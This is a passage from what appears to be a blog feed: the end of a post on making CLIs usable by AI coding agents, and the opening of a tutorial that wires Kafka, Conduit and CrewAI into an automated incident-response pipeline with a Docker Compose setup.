&lt;p&gt;In the end, this message told me it couldn’t initialize the project the way I wanted:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/e92cd/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 15.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAZUlEQVR42o3OORKAIBQDUC6DyA4fUNzuf6yIzGgrxSvSJGFB78ixgnxCCqWLjlrOSI2ZLWauICf9SwkDpoWHkwElbljpQE0nFtp7zmEF2QLJ9TD2rKvJ9JKarw+5BbYNORWH3r1uRLNbPk2s15sAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CleanShot 2025-05-28 at 5 .03.10@2x.png&quot;
        title=&quot;&quot;
        src=&quot;/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png&quot;
        srcset=&quot;/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/772e8/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png 200w,
/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/e17e5/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png 400w,
/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png 800w,
/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/c1b63/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png 1200w,
/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/29007/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png 1600w,
/static/8f59b5aaa8988ac9b61c912a1ea4d0e5/e92cd/cleanshot-2025-05-28-at-5%E2%80%AF.03.10-2x.png 1778w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Whether this is a flaw in Jules or in Svelte itself, I’ll leave up to the reader, but one thing I can already say is that Svelte (&lt;strong&gt;replace this with the product you’re developing&lt;/strong&gt;) could have made it easier for the AI coding agent to resolve.&lt;/p&gt;
&lt;h3&gt;Make your CLI AI-agent ready&lt;/h3&gt;
&lt;p&gt;As of this writing, you can initialize a SvelteKit application in one go, unless you want to add extras such as the ones I mentioned in my prompt, in particular TailwindCSS.&lt;/p&gt;
&lt;p&gt;To do that, you’d need to combine &lt;code class=&quot;language-text&quot;&gt;sv create&lt;/code&gt; with &lt;code class=&quot;language-text&quot;&gt;sv add&lt;/code&gt;. The right commands would have been:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;sv create doodle-app --template minimal --types ts&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;sv add tailwindcss&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The problem is that even the first command presents an interactive prompt:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;sv create doodle-app &lt;span class=&quot;token parameter variable&quot;&gt;--template&lt;/span&gt; minimal &lt;span class=&quot;token parameter variable&quot;&gt;--types&lt;/span&gt; ts
┌  Welcome to the Svelte CLI&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;v0.8.7&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
│
◆  Project created
│
◆  What would you like to &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; to your project? &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;use arrow keys / space bar&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
│  ◻ prettier &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;formatter - https://prettier.io&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
│  ◻ eslint
│  ◻ vitest
│  ◻ playwright
│  ◻ tailwindcss
│  ◻ sveltekit-adapter
│  ◻ drizzle
│  ◻ lucia
│  ◻ mdsvex
│  ◻ paraglide
│  ◻ storybook&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;What if this could be done in a single command, with a flag guaranteeing there won’t be a prompt?&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;sv create doodle-app &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; ts &lt;span class=&quot;token parameter variable&quot;&gt;--addon&lt;/span&gt; tailwindcss --no-input&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This use case made me think about those users who would use an AI coding agent like this one without having any coding knowledge. Isn’t that what AI coding agents are for, after all?&lt;/p&gt;
&lt;p&gt;Would they be able to initialize even a simple project like this one if they needed to? Probably not.&lt;/p&gt;
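&lt;p&gt;Supporting non-interactive use is cheap. Here is a minimal sketch of the idea in plain Python (the &lt;code class=&quot;language-text&quot;&gt;ask&lt;/code&gt; helper and &lt;code class=&quot;language-text&quot;&gt;assume_defaults&lt;/code&gt; flag are illustrative names, not part of any real CLI framework): fall back to defaults whenever a no-input flag is set, or when no human is on the other end of stdin.&lt;/p&gt;

```python
import sys

def ask(question, default, assume_defaults=False):
    # Skip the interactive prompt when a no-input flag was passed, or
    # when stdin is not a TTY (a script or an AI agent is driving us).
    if assume_defaults or not sys.stdin.isatty():
        return default
    answer = input(question + " [" + default + "]: ").strip()
    return answer or default

# An agent-driven run never blocks waiting for a keypress:
print(ask("Add TailwindCSS?", "no", assume_defaults=True))  # prints "no"
```

&lt;p&gt;A CLI built this way works identically for a human at a keyboard, a shell script in CI, and a coding agent, which is exactly the property the guidelines above ask for.&lt;/p&gt;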
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;This is not a critique of Jules or Svelte in particular. Svelte is a great front-end framework and the one that powers my personal site &lt;a href=&quot;https://raulb.dev&quot;&gt;https://raulb.dev&lt;/a&gt;. What I wanted to illustrate with this post is that you need to start thinking about a different paradigm when designing and building your CLIs.&lt;/p&gt;
&lt;p&gt;Over time, AI coding agents will become more sophisticated, and they will overcome flaws like the one I highlighted here. In the meantime, you need to reassess the current state of your CLI. If you want your product to stay relevant in the AI ecosystem we now all live in, it needs to be documented, installable, and usable in a way that lets any coding agent operate it entirely on its own. Start now, or it’ll be too late.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Stream, Think, Act: Building Autonomous Incident Response Agents with Kafka, Conduit, and CrewAI]]></title><description><![CDATA[Build a real-time incident response system using Kafka, Conduit, and CrewAI. Stream alerts, trigger AI agents, and post to Slack—all autonomously.]]></description><link>https://meroxa.com/blog/stream-think-act-building-autonomous-incident-response-agents-with-kafka-conduit-and-crewai</link><guid isPermaLink="false">https://meroxa.com/blog/stream-think-act-building-autonomous-incident-response-agents-with-kafka-conduit-and-crewai</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 28 May 2025 04:47:00 GMT</pubDate><content:encoded>&lt;p&gt;LLMs made it easy to generate answers. But the real opportunity lies in building systems that can &lt;strong&gt;act,&lt;/strong&gt; not just respond.&lt;/p&gt;
&lt;p&gt;That’s where &lt;strong&gt;agents&lt;/strong&gt; come in.&lt;/p&gt;
&lt;p&gt;Frameworks like &lt;a href=&quot;https://crewai.com/&quot;&gt;CrewAI&lt;/a&gt; let you design teams of language models that take on real tasks. But in most setups today, agents only run when you tell them to. They’re passive. They wait.&lt;/p&gt;
&lt;p&gt;If we want AI systems that feel more like software teammates — ones that respond to the world around them — we need to wire them into &lt;strong&gt;live data&lt;/strong&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;🧠 Why Agents Need Real-Time Data&lt;/h3&gt;
&lt;p&gt;Most agent workflows today:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Rely on manual triggers&lt;/li&gt;
&lt;li&gt;Operate in batch&lt;/li&gt;
&lt;li&gt;Miss the moment something important happens&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now imagine an agent that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Receives incoming signals instantly&lt;/li&gt;
&lt;li&gt;Processes and classifies them on the fly&lt;/li&gt;
&lt;li&gt;Takes action — or escalates — without needing you to hit “run”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That’s what it looks like when agents are actually part of your system — not just a tool you query. This should be the default for any agentic application with real-time stakes.&lt;/p&gt;
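&lt;p&gt;The contrast can be sketched in a few lines of plain Python. Here a &lt;code class=&quot;language-text&quot;&gt;queue.Queue&lt;/code&gt; stands in for the Kafka consumer and &lt;code class=&quot;language-text&quot;&gt;classify&lt;/code&gt; is a trivial placeholder for the LLM step; the point is only that the agent reacts the moment an event arrives, rather than waiting for someone to run it.&lt;/p&gt;

```python
import json
import queue

def classify(alert):
    # Placeholder for the LLM classification step.
    return "high" if "down" in alert["message"].lower() else "low"

def run_agent(events, handled):
    # The agent consumes events as they arrive: no manual trigger,
    # no batch window. It returns once the stream goes quiet.
    while True:
        try:
            raw = events.get(timeout=0.1)
        except queue.Empty:
            return
        alert = json.loads(raw)
        handled.append((alert["message"], classify(alert)))

events = queue.Queue()
events.put(json.dumps({"message": "API gateway down"}))
events.put(json.dumps({"message": "Disk usage at 70%"}))
handled = []
run_agent(events, handled)
```

&lt;p&gt;Swap the in-memory queue for a real Kafka topic and the placeholder for an LLM call, and you have the shape of the system this post builds.&lt;/p&gt;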
&lt;hr&gt;
&lt;h3&gt;🔌 Conduit: The Data Layer for Autonomous Agents&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt;&lt;/strong&gt; is a developer-focused data streaming &amp;#x26; processing tool for routing data across your stack. It connects to over 100 sources and destinations, including &lt;strong&gt;HTTP, Kafka, S3, Postgres&lt;/strong&gt;, Salesforce, and Zendesk, transforms the data with built-in processors (including LLMs), and pushes it to wherever your agents live.&lt;/p&gt;
&lt;p&gt;Think of it as the glue between your real-world signals and your AI workflows.&lt;/p&gt;
&lt;p&gt;With Conduit, agents can operate on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Live alerts&lt;/li&gt;
&lt;li&gt;User actions&lt;/li&gt;
&lt;li&gt;System logs&lt;/li&gt;
&lt;li&gt;Support tickets&lt;/li&gt;
&lt;li&gt;Anything else that happens in your stack&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You don’t need to reinvent stream processing — just plug it in.&lt;/p&gt;
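&lt;p&gt;To give a feel for what “plugging it in” looks like, a Conduit pipeline is described in a single YAML file. The sketch below is only an illustrative outline, not the pipeline used later in this walkthrough; the plugin identifiers, setting names, and version number are assumptions that should be checked against the Conduit documentation:&lt;/p&gt;

```yaml
# Hedged sketch of a Conduit pipeline definition: read alerts from one
# Kafka topic and write them to another. Field names (plugin, servers,
# topics/topic) are assumptions to verify against the Conduit docs.
version: "2.2"
pipelines:
  - id: alert-routing
    status: running
    connectors:
      - id: alerts-in
        type: source
        plugin: builtin:kafka
        settings:
          servers: "kafka:9092"
          topics: "raw-alerts"
      - id: alerts-out
        type: destination
        plugin: builtin:kafka
        settings:
          servers: "kafka:9092"
          topic: "processed-alerts"
```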
&lt;hr&gt;
&lt;h3&gt;🤝 CrewAI + Conduit: A Simple, Powerful Stack&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://crewai.com/&quot;&gt;CrewAI&lt;/a&gt;&lt;/strong&gt; lets you define a set of agents with clear roles and tasks. It&apos;s easy to use, flexible, and built for developers who want more than just a chatbot.&lt;/p&gt;
&lt;p&gt;When you pair CrewAI with Conduit:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Your agents get structured, enriched input the moment it matters&lt;/li&gt;
&lt;li&gt;You avoid polling, delays, and brittle pipelines&lt;/li&gt;
&lt;li&gt;You get closer to building systems that act with autonomy — not just automation&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;🛠 What We’ll Build: Real-Time Incident Response Agent&lt;/h3&gt;
&lt;p&gt;Incidents happen. But the standard response is still too manual:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An alert fires&lt;/li&gt;
&lt;li&gt;An engineer sees it (maybe)&lt;/li&gt;
&lt;li&gt;Someone summarizes it&lt;/li&gt;
&lt;li&gt;Someone else posts a Slack update&lt;/li&gt;
&lt;li&gt;Hopefully, someone opens the right runbook&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this walkthrough, we’ll create a &lt;strong&gt;Real-Time Incident Commander&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Alerts come in through an HTTP endpoint&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Conduit consumes alerts from Kafka and uses OpenAI to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Summarize the incident&lt;/li&gt;
&lt;li&gt;Classify urgency&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Messages are streamed to Kafka&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;A CrewAI team kicks in:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;TriageBot&lt;/code&gt; classifies severity&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;CommsBot&lt;/code&gt; writes a Slack update&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;RunbookBot&lt;/code&gt; suggests what to do next&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Slack gets updated in real time&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is how you move from prompt-based AI to AI systems that are always on and always aware.&lt;/p&gt;
&lt;p&gt;Let’s build it. 👇&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;🔧 System Architecture&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/eb62365c8a99ec955aad43323462bc5a/772aa/mermaid-diagram-2025-05-28-044324.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 69%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB20lEQVR42pWTa1PaUBCGU1Er7YztKFhQLiEYbglpgEZC7iGEJGCY/v8/87pnZ/xg1Sofds7MuTxn9913pZOLX/g3KtUGpNMa2j0N0TpBKCJOEEQJLq9lSOd1vPVOhPQusHINWTWQFTlWjgPHdZFmOX7WewysVI8A8gEBu30NQRhgRTB7tYLr+wRUOPujMjz91uC4rMno9HX0hzMoQ5MlqP5o8Zmo4kPgs3aDyRwbKs8L15hbNnxa3SCCtXRIzw3iJMXN3QDSWf0VWHpLO920cPh7QL7bIYwi+IEP1/OwThLsHvfYl3s0OyP+/FNAzfiD8lBis93CIZAfBAwUa1YUKPY7NNpDyvBIYErA5cpGFMcMFHE88OQKI32Bx7JEkqYYjcfUYQfmbIbpb4OBWbEjDVX+/L9AEWffb1FrqmgrOut02x2jez+lbhu4kye816JuCz+e0913uyyMKrpmLmyEodDMp8kIaUJiJJsNtnnGGQuDCy3jdUR3l69M/iJD6esNa9NTdTZ1T52iN5hShho6ygTKwOB9+V7jO026+4XefKhhR9FguyEWDx6M2ZJWF1PzgTS0YNk+B08Ma/gJY4/0ObI8pxK3VF5Is+zy+Hl+QFai0qn7jdazsV8CnwDkyXiet95hQwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;System Architecture for Crew + Conduit&quot;
        title=&quot;&quot;
        src=&quot;/static/eb62365c8a99ec955aad43323462bc5a/5a190/mermaid-diagram-2025-05-28-044324.png&quot;
        srcset=&quot;/static/eb62365c8a99ec955aad43323462bc5a/772e8/mermaid-diagram-2025-05-28-044324.png 200w,
/static/eb62365c8a99ec955aad43323462bc5a/e17e5/mermaid-diagram-2025-05-28-044324.png 400w,
/static/eb62365c8a99ec955aad43323462bc5a/5a190/mermaid-diagram-2025-05-28-044324.png 800w,
/static/eb62365c8a99ec955aad43323462bc5a/c1b63/mermaid-diagram-2025-05-28-044324.png 1200w,
/static/eb62365c8a99ec955aad43323462bc5a/29007/mermaid-diagram-2025-05-28-044324.png 1600w,
/static/eb62365c8a99ec955aad43323462bc5a/772aa/mermaid-diagram-2025-05-28-044324.png 2042w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;🧰 Prerequisites&lt;/h3&gt;
&lt;p&gt;To follow along, you’ll need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Python 3.8+&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Docker + Docker Compose&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Kafka (via Bitnami image)&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;OpenAI API Key&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Slack Bot Token&lt;/strong&gt; and &lt;strong&gt;Channel ID&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;📁 Folder Structure&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;project-root/
├── docker-compose.yml
├── .env
├── pipeline.yaml
├── alert_api/
│   ├── app.py
│   └── Dockerfile
├── crewai_runner/
│   ├── agent_runner.py
│   └── Dockerfile&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h3&gt;📄 &lt;code class=&quot;language-text&quot;&gt;.env&lt;/code&gt; (Secrets &amp;#x26; Config)&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token assign-left variable&quot;&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;sk-&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.
&lt;span class=&quot;token assign-left variable&quot;&gt;SLACK_BOT_TOKEN&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;xoxb-&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.
&lt;span class=&quot;token assign-left variable&quot;&gt;SLACK_CHANNEL_ID&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;C01&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.
&lt;span class=&quot;token assign-left variable&quot;&gt;KAFKA_BOOTSTRAP_SERVER&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;kafka:9092&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h3&gt;📦 &lt;code class=&quot;language-text&quot;&gt;docker-compose.yml&lt;/code&gt; (KRaft Kafka + Conduit + Flask + Crew)&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;3.8&apos;&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;services&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;kafka&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;image&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; bitnami/kafka&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;latest
    &lt;span class=&quot;token key atrule&quot;&gt;ports&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;9092:9092&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;environment&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_NODE_ID=0
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_PROCESS_ROLES=broker&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;controller
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@kafka&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;9093&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_LISTENERS=PLAINTEXT&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;//&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;9092&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;CONTROLLER&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;//&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;9093&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;//kafka&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;9092&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;PLAINTEXT&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;PLAINTEXT&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;PLAINTEXT
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; ALLOW_PLAINTEXT_LISTENER=yes

  &lt;span class=&quot;token key atrule&quot;&gt;conduit&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;image&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ghcr.io/conduitio/conduit&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;latest
    &lt;span class=&quot;token key atrule&quot;&gt;ports&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;8080:8080&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;volumes&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; ./pipeline.yaml&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;/etc/conduit/pipeline.yaml
    &lt;span class=&quot;token key atrule&quot;&gt;command&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;./conduit&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;run&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;/etc/conduit/pipeline.yaml&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;depends_on&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; kafka
    &lt;span class=&quot;token key atrule&quot;&gt;env_file&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; .env

  &lt;span class=&quot;token key atrule&quot;&gt;flask-alert-api&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;build&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;context&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ./alert_api
    &lt;span class=&quot;token key atrule&quot;&gt;ports&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;5000:5000&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;env_file&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; .env
    &lt;span class=&quot;token key atrule&quot;&gt;depends_on&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; kafka

  &lt;span class=&quot;token key atrule&quot;&gt;crewai-runner&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;build&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;context&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ./crewai_runner
    &lt;span class=&quot;token key atrule&quot;&gt;env_file&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; .env
    &lt;span class=&quot;token key atrule&quot;&gt;depends_on&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; kafka&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
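The Compose file points Conduit, the Flask API, and the CrewAI runner at a shared `.env` file. A minimal sketch of that file, assuming it holds only the variables referenced elsewhere in this setup (every value below is a placeholder):

```text
# Reachable from inside the Compose network via the advertised listener
KAFKA_BOOTSTRAP_SERVER=kafka:9092
# Used by the Conduit OpenAI processor
OPENAI_API_KEY=your-openai-api-key
# Used by the CrewAI runner to post to Slack
SLACK_BOT_TOKEN=your-slack-bot-token
SLACK_CHANNEL_ID=your-slack-channel-id
```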
&lt;hr&gt;
